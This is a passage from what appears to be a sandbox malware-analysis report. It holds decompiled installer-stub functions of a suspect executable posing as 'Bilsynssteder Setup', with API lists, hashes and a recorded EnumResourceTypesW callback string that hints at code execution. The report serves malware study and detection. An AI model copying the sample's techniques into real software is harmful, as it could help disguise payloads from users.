API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
API String ID: 900638850-3610614223
Opcode ID: 7ac0715764b03952955c741026f92e0c7695d25b47a09633014e38aa7c8f6962
Instruction ID: e530b436d7c2447f25c0a1e821fc153bec7607d44657ce307fe97dbee56ab49a
Opcode Fuzzy Hash: 7ac0715764b03952955c741026f92e0c7695d25b47a09633014e38aa7c8f6962
Instruction Fuzzy Hash: 9261E170A04A05ABEF205F658C88BBB7BA4EF15714F50813BE902BA2D1D27C5942DF4E

Uniqueness

Uniqueness Score: -1.00%

Function 00405475 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405475(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				CHAR* _t72;
				char* _t75;

				_t69 = _a8;
				_t72 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405733(__eflags, _t72);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42ec28 =  *0x42ec28 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00405B98(0x42b028, _t72);
					__eflags = _a4;
					if(_a4 == 0) {
						E0040568C(_t72);
					} else {
						lstrcatA(0x42b028, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409014);
						L11:
						_t71 =  &(_t72[lstrlenA(_t72)]); // executed
						_t40 = FindFirstFileA(0x42b028,  &_v336); // executed
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v336.cFileName);
							_t53 = E00405670( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t75 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405B98(_t71, _t75);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E0040542D(__eflags, _t72, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E00404EA5(0xfffffff2, _t72);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42ec28 =  *0x42ec28 + 1;
										} else {
											E00404EA5(0xfffffff1, _t72);
											E00405A4C(_t72, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405475(__eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42b028 - 0x5c;
					if( *0x42b028 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E00405E9C(_t72);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405645(_t72);
							_t40 = E0040542D(__eflags, _t72, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E00404EA5(0xffffffe5, _t72);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E00404EA5(0xfffffff1, _t72);
							return E00405A4C(_t72, 0);
						}
						L33:
						 *0x42ec28 =  *0x42ec28 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x0040547f
0x00405484
0x0040548d
0x00405490
0x00405498
0x0040549b
0x0040549e
0x004054a6
0x004054a8
0x004054a9
0x00000000
0x004054a9
0x004054b4
0x004054b7
0x004054b7
0x004054b7
0x004054bb
0x004054ce
0x004054d5
0x004054da
0x004054de
0x004054ee
0x004054e0
0x004054e6
0x004054e6
0x004054f3
0x004054f6
0x00405501
0x00405507
0x0040550c
0x0040551c
0x0040551e
0x00405524
0x00405527
0x0040552a
0x004055e2
0x004055e2
0x004055e6
0x004055e8
0x004055e8
0x004055e8
0x004055e8
0x00000000
0x00000000
0x00000000
0x00000000
0x00405530
0x00405530
0x00405539
0x0040553f
0x00405544
0x00405547
0x00405549
0x0040554d
0x0040554f
0x0040554f
0x0040554d
0x00405552
0x00405555
0x00405568
0x0040556a
0x0040556f
0x00405576
0x00405591
0x00405596
0x00405598
0x004055bc
0x0040559a
0x0040559a
0x0040559d
0x004055b1
0x0040559f
0x004055a2
0x004055aa
0x004055aa
0x0040559d
0x00405578
0x0040557e
0x00405580
0x00405586
0x00405586
0x00405580
0x00000000
0x00405576
0x00405557
0x0040555a
0x0040555c
0x00000000
0x00000000
0x0040555e
0x00405560
0x00000000
0x00000000
0x00405562
0x00405566
0x00000000
0x00000000
0x00000000
0x004055c1
0x004055cb
0x004055d1
0x004055d1
0x004055dc
0x00000000
0x004055dc
0x004054f8
0x004054ff
0x00000000
0x00000000
0x00000000
0x004054bd
0x004054bd
0x004054bf
0x004055ec
0x004055ee
0x004055f1
0x00405642
0x00405642
0x00405642
0x004055f3
0x004055f6
0x00405601
0x00405606
0x00405608
0x00000000
0x00000000
0x0040560b
0x00405617
0x0040561c
0x0040561e
0x00000000
0x00405639
0x00405620
0x00405623
0x00000000
0x00000000
0x00405628
0x00000000
0x0040562f
0x004055f8
0x004055f8
0x00000000
0x004055f8
0x004054c5
0x004054c8
0x00000000
0x00000000
0x00000000
0x004054c8

APIs

DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75DD3410,00000000), ref: 0040549E
lstrcatA.KERNEL32(Resolver.Sel,\*.*,Resolver.Sel,?,?,C:\Users\user\AppData\Local\Temp\,75DD3410,00000000), ref: 004054E6
lstrcatA.KERNEL32(?,00409014,?,Resolver.Sel,?,?,C:\Users\user\AppData\Local\Temp\,75DD3410,00000000), ref: 00405507
lstrlenA.KERNEL32(?,?,00409014,?,Resolver.Sel,?,?,C:\Users\user\AppData\Local\Temp\,75DD3410,00000000), ref: 0040550D
FindFirstFileA.KERNELBASE(Resolver.Sel,?,?,?,00409014,?,Resolver.Sel,?,?,C:\Users\user\AppData\Local\Temp\,75DD3410,00000000), ref: 0040551E
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004055CB
FindClose.KERNEL32(00000000), ref: 004055DC

Strings

Resolver.Sel, xrefs: 004054CE, 004054D4, 004054E5, 0040551B
\*.*, xrefs: 004054E0
"C:\Users\user\Desktop\SC.028UCCP.exe", xrefs: 00405475
C:\Users\user\AppData\Local\Temp\, xrefs: 00405483

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\SC.028UCCP.exe"$C:\Users\user\AppData\Local\Temp\$Resolver.Sel$\*.*
API String ID: 2035342205-3716855913
Opcode ID: 6ff50277c47477ba13b9978e87605e00e69da3f94f5fa5e74a520864d0ac4353
Instruction ID: dbbc29da06062d166e219680d33f07273b6795458a0971578ca4c48f9a6f899a
Opcode Fuzzy Hash: 6ff50277c47477ba13b9978e87605e00e69da3f94f5fa5e74a520864d0ac4353
Instruction Fuzzy Hash: C051EE30800A04BADF22AB62CC45BAF7AB9DB42314F54417BF455711D2CB3C9A82DF6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405E9C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E9C(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42b870); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2); // executed
				return 0x42b870;
			}

0x00405ea7
0x00405eb0
0x00000000
0x00405ebd
0x00405eb3
0x00000000

APIs

FindFirstFileA.KERNELBASE(?,0042B870,Resolver.Sel,00405776,Resolver.Sel,Resolver.Sel,00000000,Resolver.Sel,Resolver.Sel,?,?,75DD3410,00405495,?,C:\Users\user\AppData\Local\Temp\,75DD3410), ref: 00405EA7
FindClose.KERNELBASE(00000000), ref: 00405EB3

Strings

Resolver.Sel, xrefs: 00405E9C

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: Resolver.Sel
API String ID: 2295610775-3053244350
Opcode ID: 1aea5c224ac18c2ca6740f992a10f01b1202162fc1be4398f9fc9754ba096347
Instruction ID: 48e65e0373d101f51a2011d852bf3b0db847c0e77ea6d2d4d1a06a98fdfa31a0
Opcode Fuzzy Hash: 1aea5c224ac18c2ca6740f992a10f01b1202162fc1be4398f9fc9754ba096347
Instruction Fuzzy Hash: 2BD01235A0A4309BD3011738AD0C84B7A58DB053317108A33F8A9F13E0D3349D529AED

Uniqueness

Uniqueness Score: -1.00%

Function 00405EC3 Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405EC3(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409238);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x40923c));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}

0x00405ecb
0x00405ece
0x00405ed5
0x00405edd
0x00405eea
0x00000000
0x00405ef1
0x00405ee0
0x00405ee8
0x00000000
0x00000000
0x00405ef9

APIs

GetModuleHandleA.KERNEL32(?,?,?,00403150,00000008), ref: 00405ED5
LoadLibraryA.KERNELBASE(?,?,?,00403150,00000008), ref: 00405EE0
GetProcAddress.KERNEL32(00000000,?), ref: 00405EF1

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 054130f1168f4888e0973aa3cf4ac603bfb450dfe6f2d22fd482d5db7ed26554
Instruction ID: dab59f0173490024aeed2266f34dc7cbbf7987d09f0ead05b8accc78f0831993
Opcode Fuzzy Hash: 054130f1168f4888e0973aa3cf4ac603bfb450dfe6f2d22fd482d5db7ed26554
Instruction Fuzzy Hash: ADE0C232A04511ABC720AB30ED0897B73ACEF88B41701497EF985F6151DB34AC11AFBB

Uniqueness

Uniqueness Score: -1.00%

Function 004039D5 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004039D5(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t141;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42a008 = _t35;
					if(_t115 == 0x110) {
						 *0x42eba8 = _t125;
						 *0x42a01c = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x428fe8 = _t91;
						E00403EA8(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x42e388);
						 *0x42e36c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a008 = 1;
					}
					_t122 =  *0x4091d4; // 0x0
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x42ebc0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403EF4(0x40b);
						while(1) {
							_t37 =  *0x42a008;
							 *0x4091d4 =  *0x4091d4 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091d4; // 0x0
							__eflags = _t39 -  *0x42ebc4; // 0x4
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42e36c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x42ebc4; // 0x4
							__eflags =  *0x4091d4 - _t44; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405BBA(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403EA8(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403EA8(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403EA8(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42ec2c - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008); // executed
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100); // executed
							E00403ECA(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x428fe8, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42ec2c - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x42a01c);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x428fe8);
							}
							E00403EDD();
							E00405B98(0x42a020, "Bilsynssteder Setup");
							E00405BBA(0x42a020, _t125, _t130,  &(0x42a020[lstrlenA(0x42a020)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x42a020); // executed
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x42e378); // executed
									 *0x4297f8 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x42eba0,  *_t130 +  *0x42e380 & 0x0000ffff, _t125,  *(0x4091d8 +  *(_t130 + 4) * 4), _t130); // executed
									__eflags = _t73 - _t133;
									 *0x42e378 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403EA8(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x42e378, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42e36c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42e378, 8);
									E00403EF4(0x405);
									goto L58;
								}
								__eflags =  *0x42ec2c - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x42ec20 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42e378);
						 *0x42eba8 = _t133;
						EndDialog(_t125,  *0x4293f0);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x42e378, 0x40f, 0, 1);
						__eflags =  *0x42e36c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x42a000, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a000,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403F0F(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x42e378, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42ec2c - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x4293f0 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E81();
											goto L26;
										}
										E0040140B(_t127);
										 *0x4293f0 = _t127;
										goto L21;
									}
									__eflags =  *0x4091d4 - _t133; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x42e378);
						 *0x42e378 = _a12;
						L58:
						_t141 =  *0x42b020 - _t133; // 0x0
						if(_t141 == 0) {
							_t142 =  *0x42e378 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x42b020 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

0x004039de
0x004039e7
0x00403b28
0x00403b2c
0x00403b30
0x00403b32
0x00403b37
0x00403b42
0x00403b4d
0x00403b52
0x00403b54
0x00403b56
0x00403b59
0x00403b5e
0x00403b6c
0x00403b79
0x00403b80
0x00403b80
0x00403b81
0x00403b81
0x00403b86
0x00403b8c
0x00403b93
0x00403b99
0x00403b9b
0x00403bdb
0x00403be0
0x00403be5
0x00403be5
0x00403bea
0x00403bf3
0x00403bf5
0x00403bfa
0x00403c00
0x00403c04
0x00403c04
0x00403c09
0x00403c0f
0x00000000
0x00000000
0x00403c15
0x00403c1a
0x00403c20
0x00000000
0x00000000
0x00403c29
0x00403c31
0x00403c36
0x00403c39
0x00403c3f
0x00403c44
0x00403c47
0x00403c4d
0x00403c52
0x00403c55
0x00403c5b
0x00403c63
0x00403c69
0x00403c6f
0x00403c73
0x00403c7a
0x00403c7a
0x00403c7a
0x00403c84
0x00403c96
0x00403ca2
0x00403ca7
0x00403cb1
0x00403cb7
0x00403cb9
0x00403cbe
0x00403cbb
0x00403cbb
0x00403cbb
0x00403cce
0x00403ce6
0x00403ce8
0x00403cee
0x00403d03
0x00403cf0
0x00403cf9
0x00403cfb
0x00403cfb
0x00403d09
0x00403d19
0x00403d2a
0x00403d31
0x00403d37
0x00403d3b
0x00403d40
0x00403d42
0x00000000
0x00403d48
0x00403d48
0x00403d4a
0x00000000
0x00000000
0x00403d50
0x00403d54
0x00403d79
0x00403d7f
0x00403d85
0x00403d87
0x00000000
0x00000000
0x00403dad
0x00403db3
0x00403db5
0x00403dba
0x00000000
0x00000000
0x00403dc0
0x00403dc3
0x00403dc6
0x00403ddd
0x00403de9
0x00403e02
0x00403e08
0x00403e0c
0x00403e11
0x00403e17
0x00000000
0x00000000
0x00403e21
0x00403e2c
0x00000000
0x00403e2c
0x00403d56
0x00403d5c
0x00000000
0x00000000
0x00403d62
0x00403d68
0x00000000
0x00000000
0x00000000
0x00403d6e
0x00403d42
0x00403e39
0x00403e45
0x00403e4c
0x00000000
0x00403b9d
0x00403b9d
0x00403ba0
0x00403bd3
0x00403bd3
0x00403bd5
0x00000000
0x00000000
0x00000000
0x00403bd5
0x00403ba2
0x00403ba6
0x00403bab
0x00403bad
0x00000000
0x00000000
0x00403bbd
0x00403bc5
0x00000000
0x00403bcb
0x004039f9
0x004039f9
0x004039fd
0x00403a02
0x00403a11
0x00403a11
0x00403a1a
0x00403a23
0x00403a2e
0x00403a2e
0x00403a3a
0x00403a56
0x00403a59
0x00403a6c
0x00403a72
0x00403b15
0x00000000
0x00403b1e
0x00403a78
0x00403a85
0x00403a87
0x00403a89
0x00403aa8
0x00403aa8
0x00403aab
0x00403ab0
0x00403ab3
0x00403ac3
0x00403ac4
0x00403ac6
0x00403afc
0x00403b0f
0x00000000
0x00403b0f
0x00403ac8
0x00403ace
0x00403ae7
0x00403aec
0x00403aee
0x00000000
0x00000000
0x00403af0
0x00403adc
0x00403adc
0x00403ade
0x00403ade
0x00000000
0x00403ade
0x00403ad1
0x00403ad6
0x00000000
0x00403ad6
0x00403ab5
0x00403abb
0x00000000
0x00000000
0x00403abd
0x00000000
0x00403abd
0x00403aad
0x00000000
0x00403aad
0x00403a93
0x00403a9a
0x00403aa0
0x00403aa2
0x00000000
0x00000000
0x00000000
0x00403aa2
0x00403a5e
0x00000000
0x00403a3c
0x00403a42
0x00403a4c
0x00403e52
0x00403e52
0x00403e58
0x00403e5a
0x00403e60
0x00403e65
0x00403e6b
0x00403e6b
0x00403e60
0x00403e75
0x00000000
0x00403e75
0x00403a3a

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A11
ShowWindow.USER32(?), ref: 00403A2E
DestroyWindow.USER32 ref: 00403A42
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A5E
GetDlgItem.USER32(?,?), ref: 00403A7F
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A93
IsWindowEnabled.USER32(00000000), ref: 00403A9A
GetDlgItem.USER32(?,00000001), ref: 00403B48
GetDlgItem.USER32(?,00000002), ref: 00403B52
SetClassLongA.USER32(?,000000F2,?), ref: 00403B6C
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403BBD
GetDlgItem.USER32(?,00000003), ref: 00403C63
ShowWindow.USER32(00000000,?), ref: 00403C84
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403C96
EnableWindow.USER32(?,?), ref: 00403CB1
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CC7
EnableMenuItem.USER32(00000000), ref: 00403CCE
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CE6
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CF9
lstrlenA.KERNEL32(0042A020,?,0042A020,Bilsynssteder Setup), ref: 00403D22
SetWindowTextA.USER32(?,0042A020), ref: 00403D31
ShowWindow.USER32(?,0000000A), ref: 00403E65

Strings

Bilsynssteder Setup, xrefs: 00403D13

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: Bilsynssteder Setup
API String ID: 3282139019-834225588
Opcode ID: b991a7b254102f6ecea75b85d71796a317f2d7b88233d17001629b70a85278c2
Instruction ID: e8fab78920e23da8b75c4c4288663781101d80ffa248271b1c4be7e920c598d9
Opcode Fuzzy Hash: b991a7b254102f6ecea75b85d71796a317f2d7b88233d17001629b70a85278c2
Instruction Fuzzy Hash: 5AC19131A04204BBDB21AF62ED45E2B3E6DFB45706F40053EF641B21E1C779A9429B5E

Uniqueness

Uniqueness Score: -1.00%

Function 00403643 Relevance: 51.0, APIs: 16, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403643() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				signed int _t21;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				struct HINSTANCE__* _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				intOrPtr _t55;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				signed short _t67;
				struct HINSTANCE__* _t71;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t82;

